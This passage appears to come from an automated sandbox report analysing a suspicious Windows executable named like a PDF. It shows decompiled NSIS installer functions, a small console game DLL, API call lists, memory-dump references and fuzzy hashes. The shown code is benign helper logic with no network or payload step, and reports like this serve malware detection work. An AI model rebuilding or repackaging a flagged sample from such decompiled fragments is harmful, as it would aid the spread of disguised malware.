						_t65 = _t66 + 4;
						_t22 = _t52;
						if(_t59 != _t21) {
							_t23 = _t22 & 0x80000001;
							__eflags = _t23;
							if(_t23 < 0) {
								_t23 = (_t23 - 0x00000001 | 0xfffffffe) + 1;
								__eflags = _t23;
							}
							asm("sbb eax, eax");
							 *0x10003028 = _t52 + 1;
							_t26 = ( ~_t23 & 0xfffffffe) + 5;
							__eflags = _t26;
							 *(0x10003000 + _t59 * 4) = _t26;
							E10001140();
							return E10001780(__eflags);
						} else {
							_t31 = _t22 & 0x80000001;
							if(_t31 < 0) {
								_t31 = (_t31 - 0x00000001 | 0xfffffffe) + 1;
							}
							asm("sbb eax, eax");
							 *0x10003028 = _t52 + 1;
							 *(0x10003000 + _t59 * 4) = ( ~_t31 & 0xfffffffe) + 5;
							E10001140();
							0x10004b24->X = 0x14001e;
							SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0x10004b24->X);
							_push("Player Wins");
							goto L3;
						}
					} else {
						0x10004b24->X = 0x14001e;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0x10004b24->X);
						_push("Game Draw");
						L3:
						E10001690();
						_t65 = _t65 + 4;
						__imp___getch();
						exit(0);
						goto L4;
					}
				} else {
					0x10004b24->X = 0x14001e;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0x10004b24);
					E10001690();
					return __imp___getch("Computer wins");
				}
			}



















                                                                                                  0x10001786
                                                                                                  0x1000178b
                                                                                                  0x10001790
                                                                                                  0x100017b9
                                                                                                  0x100017be
                                                                                                  0x100017c1
                                                                                                  0x100017c3
                                                                                                  0x100017c5
                                                                                                  0x100017ca
                                                                                                  0x100017cc
                                                                                                  0x100017ce
                                                                                                  0x100017ce
                                                                                                  0x100017cc
                                                                                                  0x100017d3
                                                                                                  0x100017db
                                                                                                  0x100017db
                                                                                                  0x100017e1
                                                                                                  0x100017e7
                                                                                                  0x100017e7
                                                                                                  0x100017e7
                                                                                                  0x10001792
                                                                                                  0x10001792
                                                                                                  0x10001798
                                                                                                  0x1000179a
                                                                                                  0x1000179a
                                                                                                  0x100017a0
                                                                                                  0x100017a2
                                                                                                  0x100017a3
                                                                                                  0x100017a6
                                                                                                  0x100017a6
                                                                                                  0x100017a7
                                                                                                  0x100017a7
                                                                                                  0x100017ea
                                                                                                  0x100017f0
                                                                                                  0x100017f6
                                                                                                  0x100017f9
                                                                                                  0x10001800
                                                                                                  0x10001805
                                                                                                  0x1000180c
                                                                                                  0x100013f3
                                                                                                  0x100013fb
                                                                                                  0x10001437
                                                                                                  0x10001438
                                                                                                  0x1000143d
                                                                                                  0x10001456
                                                                                                  0x10001461
                                                                                                  0x1000146f
                                                                                                  0x10001474
                                                                                                  0x10001477
                                                                                                  0x10001482
                                                                                                  0x10001484
                                                                                                  0x10001489
                                                                                                  0x10001489
                                                                                                  0x10001492
                                                                                                  0x10001497
                                                                                                  0x1000149d
                                                                                                  0x100014a2
                                                                                                  0x100014a4
                                                                                                  0x100014f8
                                                                                                  0x100014f8
                                                                                                  0x100014fd
                                                                                                  0x10001503
                                                                                                  0x10001503
                                                                                                  0x10001503
                                                                                                  0x10001506
                                                                                                  0x1000150c
                                                                                                  0x10001512
                                                                                                  0x10001512
                                                                                                  0x10001515
                                                                                                  0x1000151c
                                                                                                  0x1000152a
                                                                                                  0x100014a6
                                                                                                  0x100014a6
                                                                                                  0x100014ab
                                                                                                  0x100014b1
                                                                                                  0x100014b1
                                                                                                  0x100014b4
                                                                                                  0x100014ba
                                                                                                  0x100014c3
                                                                                                  0x100014ca
                                                                                                  0x100014cf
                                                                                                  0x100014e8
                                                                                                  0x100014ee
                                                                                                  0x00000000
                                                                                                  0x100014ee
                                                                                                  0x100013fd
                                                                                                  0x100013fd
                                                                                                  0x10001416
                                                                                                  0x1000141c
                                                                                                  0x10001421
                                                                                                  0x10001421
                                                                                                  0x10001426
                                                                                                  0x10001429
                                                                                                  0x10001431
                                                                                                  0x00000000
                                                                                                  0x10001431
                                                                                                  0x1000180e
                                                                                                  0x1000180e
                                                                                                  0x10001827
                                                                                                  0x10001832
                                                                                                  0x1000183a
                                                                                                  0x1000183a

                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,100013E5), ref: 10001820
                                                                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,100013E5), ref: 10001827
                                                                                                  • _printf.MSPDB140-MSVCRT ref: 10001832
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleCursorHandlePosition_printf
                                                                                                  • String ID: Computer wins
                                                                                                  • API String ID: 1663292651-2011947360
                                                                                                  • Opcode ID: 97838aacb384ba789bfa29b554c06510a59d182645dd0f31f59d9d2e0e37f84f
                                                                                                  • Instruction ID: bd42079b5aceb24b900082d139a1be4e18f5282492595b537eabfe2872bbeecf
                                                                                                  • Opcode Fuzzy Hash: 97838aacb384ba789bfa29b554c06510a59d182645dd0f31f59d9d2e0e37f84f
                                                                                                  • Instruction Fuzzy Hash: 8911A1B880422197F30D8B609DA53DB36A9EB483E5F154328F616811FEDB7694458B06
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00405817, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00405817(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                                                                  0x00405818
                                                                                                  0x0040582f
                                                                                                  0x00405837
                                                                                                  0x00405837
                                                                                                  0x0040583f

                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040325C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004033FD), ref: 0040581D
                                                                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040325C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004033FD), ref: 00405826
                                                                                                  • lstrcatA.KERNEL32(?,00409010), ref: 00405837
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405817
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                  • API String ID: 2659869361-823278215
                                                                                                  • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                                                                  • Instruction ID: a95e0cb8ac1e014464e85ca62376352c112a7956a554afc6d32bc34e627a9068
                                                                                                  • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                                                                  • Instruction Fuzzy Hash: A0D0A962605A302AD30236159C09E8F3A08CF12300B048833F640BA292C23C1C818FEE
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00401D38, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 67%
                                                                                                  			E00401D38() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b034->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
				 *0x40b044 = E00402A0C(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b04b = 1;
				 *0x40b048 = _t11 & 0x00000001;
				 *0x40b049 = _t11 & 0x00000002;
				 *0x40b04a = _t11 & 0x00000004;
				E00405D46(_t18, _t24, _t26, 0x40b050,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b034);
				_push(_t14);
				_push(_t26);
				E00405C82();
				 *0x7a2828 =  *0x7a2828 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                                                                  0x00401d46
                                                                                                  0x00401d5f
                                                                                                  0x00401d69
                                                                                                  0x00401d6e
                                                                                                  0x00401d79
                                                                                                  0x00401d80
                                                                                                  0x00401d92
                                                                                                  0x00401d98
                                                                                                  0x00401d9d
                                                                                                  0x00401da7
                                                                                                  0x004024eb
                                                                                                  0x00401561
                                                                                                  0x00402866
                                                                                                  0x004028c1
                                                                                                  0x004028cd

                                                                                                  APIs
                                                                                                  • GetDC.USER32(?), ref: 00401D3F
                                                                                                  • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                                                                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                                                                                                  • CreateFontIndirectA.GDI32(0040B034), ref: 00401DA7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: CapsCreateDeviceFontIndirect
                                                                                                  • String ID:
                                                                                                  • API String ID: 3272661963-0
                                                                                                  • Opcode ID: 270685dac792171dcdf9d51eb1502def5d31926f699fc2ffb5e64ceeb9e89bf9
                                                                                                  • Instruction ID: b3116c7c608ef8e71e7d0cd7a5f3f1aec4dac111d89f02bbff535c5532fba0ba
                                                                                                  • Opcode Fuzzy Hash: 270685dac792171dcdf9d51eb1502def5d31926f699fc2ffb5e64ceeb9e89bf9
                                                                                                  • Instruction Fuzzy Hash: 1BF0C2B0A48280AFE71167B09F4EB9B3F64D712305F104876F251BA2E3C7BD00048BAE
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00403A40, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00403A40(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405C9B(__ecx, "1033");
				while(1) {
					_t26 =  *0x7a27e4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x7a27b0 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x7a27e0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x7a1f80 = _t18[1];
					 *0x7a2848 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x7a1f7c = _t23;
						E00405C82(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x79ed78, E00405D46(_t13, _t24, _t26, 0x7a1fa0, 0xfffffffe));
						_t11 =  *0x7a27cc;
						_t27 =  *0x7a27c8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405D46(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                                                                                                  0x00403a44
                                                                                                  0x00403a49
                                                                                                  0x00403a4f
                                                                                                  0x00403a54
                                                                                                  0x00403a54
                                                                                                  0x00403a5c
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403a64
                                                                                                  0x00403a6c
                                                                                                  0x00403a6e
                                                                                                  0x00403a74
                                                                                                  0x00403a74
                                                                                                  0x00403a76
                                                                                                  0x00403a82
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403a86
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403a88
                                                                                                  0x00403a8d
                                                                                                  0x00403a96
                                                                                                  0x00403a9c
                                                                                                  0x00403aa1
                                                                                                  0x00403ab5
                                                                                                  0x00403ac0
                                                                                                  0x00403ad8
                                                                                                  0x00403ade
                                                                                                  0x00403ae3
                                                                                                  0x00403aeb
                                                                                                  0x00403b0c
                                                                                                  0x00403b0c
                                                                                                  0x00403b0c
                                                                                                  0x00403aed
                                                                                                  0x00403aef
                                                                                                  0x00403aef
                                                                                                  0x00403af3
                                                                                                  0x00403afa
                                                                                                  0x00403afa
                                                                                                  0x00403aff
                                                                                                  0x00403b05
                                                                                                  0x00403b05
                                                                                                  0x00000000
                                                                                                  0x00403aef
                                                                                                  0x00403aa3
                                                                                                  0x00403aa8
                                                                                                  0x00403ab1
                                                                                                  0x00403aaa
                                                                                                  0x00403aaa
                                                                                                  0x00403aaa
                                                                                                  0x00403aa8

                                                                                                  APIs
                                                                                                  • SetWindowTextA.USER32(00000000,007A1FA0), ref: 00403AD8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: TextWindow
                                                                                                  • String ID: "C:\Users\user\Desktop\MV Sky Marine_pdf.exe" $1033
                                                                                                  • API String ID: 530164218-3230575046
                                                                                                  • Opcode ID: 6ca1e07f4f6f048d78a45ddfc5f1b12e3c6f0990ccb150b26f1ff58d632b7665
                                                                                                  • Instruction ID: 835eaf96e6078b83d2888eeaa02e7bd7f90582720093d8bf5748709f1fda60b2
                                                                                                  • Opcode Fuzzy Hash: 6ca1e07f4f6f048d78a45ddfc5f1b12e3c6f0990ccb150b26f1ff58d632b7665
                                                                                                  • Instruction Fuzzy Hash: E611D175B046119FD7209F15DC809337BACEBC6755328823BE942A73A1C73D9E028E68
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00404F60, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00404F60(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x79ed88 != _t22) {
							 *0x79ed88 = _t22;
							E00405D24(0x79eda0, 0x7a3000);
							E00405C82(0x7a3000, _t22);
							E0040140B(6);
							E00405D24(0x7a3000, 0x79eda0);
						}
						L11:
						return CallWindowProcA( *0x79ed90, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004048DF(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E0040402C(0x413);
				return 0;
			}




                                                                                                  0x00404f6c
                                                                                                  0x00404f91
                                                                                                  0x00404fb1
                                                                                                  0x00404fb4
                                                                                                  0x00404fb7
                                                                                                  0x00404fce
                                                                                                  0x00404fd4
                                                                                                  0x00404fdb
                                                                                                  0x00404fe2
                                                                                                  0x00404fe9
                                                                                                  0x00404fee
                                                                                                  0x00404ff4
                                                                                                  0x00000000
                                                                                                  0x00405004
                                                                                                  0x00404f9e
                                                                                                  0x00404ff1
                                                                                                  0x00404ff1
                                                                                                  0x00000000
                                                                                                  0x00404ff1
                                                                                                  0x00404faa
                                                                                                  0x00404fac
                                                                                                  0x00000000
                                                                                                  0x00404fac
                                                                                                  0x00404f72
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00404f79
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • IsWindowVisible.USER32(?), ref: 00404F96
                                                                                                  • CallWindowProcA.USER32 ref: 00405004
                                                                                                    • Part of subcall function 0040402C: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0040403E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                  • String ID:
                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                  • Opcode ID: 56db4a1e9125a8ea3acf90020d7134a33c4515938cf1c18d3ae574c1a67c6e35
                                                                                                  • Instruction ID: 4aeb67807fdb1cb12a88b80debadbfe2652d5d8b7ce58ed4c08cf84036e88e3c
                                                                                                  • Opcode Fuzzy Hash: 56db4a1e9125a8ea3acf90020d7134a33c4515938cf1c18d3ae574c1a67c6e35
                                                                                                  • Instruction Fuzzy Hash: 94118F7160420AFBEF219F51DD8499B3769EF94354F00803BFA04791D1C77D4D51ABA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004058F8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 53%
                                                                                                  			E004058F8(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405D24(0x7a01a8, _a4);
				_t21 = E004058AB(0x7a01a8);
				if(_t21 != 0) {
					E00405F86(_t21);
					if(( *0x7a27b8 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x7a01a8;
						while(1) {
							_t11 = lstrlenA(0x7a01a8);
							_push(0x7a01a8);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E0040601F();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E0040585E(0x7a01a8);
								continue;
							} else {
								goto L1;
							}
						}
						E00405817();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                                                                  0x00405904
                                                                                                  0x0040590f
                                                                                                  0x00405913
                                                                                                  0x0040591a
                                                                                                  0x00405926
                                                                                                  0x00405932
                                                                                                  0x00405932
                                                                                                  0x0040594a
                                                                                                  0x0040594b
                                                                                                  0x00405952
                                                                                                  0x00405953
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405936
                                                                                                  0x0040593d
                                                                                                  0x00405945
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040593d
                                                                                                  0x00405955
                                                                                                  0x00000000
                                                                                                  0x00405969
                                                                                                  0x00405928
                                                                                                  0x0040592c
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040592c
                                                                                                  0x00405915
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                    • Part of subcall function 00405D24: lstrcpynA.KERNEL32(?,?,00000400,0040331D,007A1FA0,NSIS Error), ref: 00405D31
                                                                                                    • Part of subcall function 004058AB: CharNextA.USER32(]V@,?,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,00000000,0040590F,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,?,?,7519F560,0040565D,?,C:\Users\user\AppData\Local\Temp\,7519F560), ref: 004058B9
                                                                                                    • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058BE
                                                                                                    • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058CD
                                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,00000000,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,?,?,7519F560,0040565D,?,C:\Users\user\AppData\Local\Temp\,7519F560), ref: 0040594B
                                                                                                  • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,00000000,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,?,?,7519F560,0040565D,?,C:\Users\user\AppData\Local\Temp\,7519F560), ref: 0040595B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nssBDFE.tmp
                                                                                                  • API String ID: 3248276644-1451364421
                                                                                                  • Opcode ID: 9b33f393c9906aa5ae3fd14345dcca3a932272e6c6471dc722f7dd082b1270ea
                                                                                                  • Instruction ID: 669593518fdf3d348a5a3043acb3374678987c8463d37e55929acd63b73e0dea
                                                                                                  • Opcode Fuzzy Hash: 9b33f393c9906aa5ae3fd14345dcca3a932272e6c6471dc722f7dd082b1270ea
                                                                                                  • Instruction Fuzzy Hash: 9EF028B2114D2195D722333A5C09AAF0645CDC333870A453FFCA1B12D2DA3C89538D6E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 100016C0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 40%
                                                                                                  			E100016C0(char _a4, signed int _a8) {
				void* __esi;
				void* _t34;
				intOrPtr* _t35;
				short _t37;
				struct _COORD _t41;
				signed int _t43;
				void* _t44;
				signed int _t45;
				void* _t47;

				_t43 = _a8;
				_t41 = 0x1f;
				_t2 = _t41 - 0x15; // 0xa
				_t37 = _t2;
				if(_t43 > 3) {
					_t6 = __esi - 4; // 0x100011fa
					__ecx = _t6;
					__edx = 0xaaaaaaab * __ecx >> 0x20;
					__edx = 0xaaaaaaab * __ecx >> 0x20 >> 1;
					0xd + __edx * 2 = 0xd + __edx * 2 + __edx;
				}
				_t44 = _t43 - (0x55555556 * _t43 >> 0x20 >> 0x1f) + (0x55555556 * _t43 >> 0x20) + ((0x55555556 * _t43 >> 0x20 >> 0x1f) + (0x55555556 * _t43 >> 0x20)) * 2;
				if(_t44 != 0) {
					_t45 = _t44 + 0xffffffff;
					if(_t45 != 0) {
						_t41 = 0x1f + _t45 * 8;
					}
				} else {
					_t19 = _t44 + 0x2f; // 0x1000122d
					_t41 = _t19;
				}
				0x10004b24->X = _t41;
				 *0x10004b26 = _t37;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0x10004b24);
				_pop(_t43);
				_a8 = _a4;
				_a4 = 0x10003114;
				_pop(_t47);
				_t34 =  *0x10000000(1, _t43, _t47);
				_t35 = E100010D0();
				return  *0x10000000( *_t35,  *((intOrPtr*)(_t35 + 4)), _t34, _a4, 0,  &_a8);
			}












                                                                                                  0x100016c4
                                                                                                  0x100016c8
                                                                                                  0x100016cd
                                                                                                  0x100016cd
                                                                                                  0x100016d3
                                                                                                  0x100016d5
                                                                                                  0x100016d5
                                                                                                  0x100016dd
                                                                                                  0x100016df
                                                                                                  0x100016e8
                                                                                                  0x100016e8
                                                                                                  0x100016fb
                                                                                                  0x100016fd
                                                                                                  0x10001704
                                                                                                  0x10001707
                                                                                                  0x10001709
                                                                                                  0x10001709
                                                                                                  0x100016ff
                                                                                                  0x100016ff
                                                                                                  0x100016ff
                                                                                                  0x100016ff
                                                                                                  0x10001710
                                                                                                  0x10001717
                                                                                                  0x1000172d
                                                                                                  0x10001738
                                                                                                  0x10001739
                                                                                                  0x1000173c
                                                                                                  0x10001743
                                                                                                  0x10001699
